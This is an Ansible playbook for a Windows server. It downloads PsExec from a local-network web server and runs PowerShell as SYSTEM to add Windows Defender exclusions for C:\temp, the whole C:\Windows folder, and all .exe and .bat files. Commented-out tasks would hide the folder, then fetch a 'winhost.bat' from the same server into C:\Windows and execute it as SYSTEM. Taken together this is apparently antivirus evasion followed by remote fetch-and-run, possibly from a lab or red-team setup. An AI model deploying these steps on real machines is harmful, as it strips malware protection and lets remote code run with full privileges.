-
  name: Windows Copy .bat file
  hosts: windows-server
  become_method: runas
  tasks:
    - name: Creates directory
      win_file:
          path: C:\temp\
          state: directory

    - name: Get Executable from the host
      win_get_url:
        url: http://192.168.13.129/temp/PsExec.exe
        dest: C:\temp\PsExec.exe
    -
      name:  Exclude Windows
      win_psexec:
        command: '{{ item }}'
        executable: C:\temp\PsExec.exe
        elevated: yes
        nobanner: yes
        system: yes
        interactive: yes
      with_items:
        - powershell.exe Add-MpPreference -ExclusionPath "C:\temp"
        - powershell.exe Add-MpPreference -ExclusionPath "C:\Windows"
        - powershell.exe Add-MpPreference -ExclusionExtension ".exe"
        - powershell.exe Add-MpPreference -ExclusionExtension ".bat"
#        - powershell.exe Get-Item 'C:\temp' -Force | foreach { $_.Attributes = $_.Attributes -bor "Hidden" }

    # -
    #   name: Get Executable from the host
    #   win_get_url:
    #     url: http://192.168.13.129/temp/winhost.bat
    #     dest: C:\Windows\winhost.bat





    # -
    #   name: Run the executable
    #   win_psexec:
    #     command: C:\Windows\winhost.bat
    #     system: yes

      #win_copy:
      #  src: /var/www/html/temp/winhost.bat
      #  dest: C:\Windows\
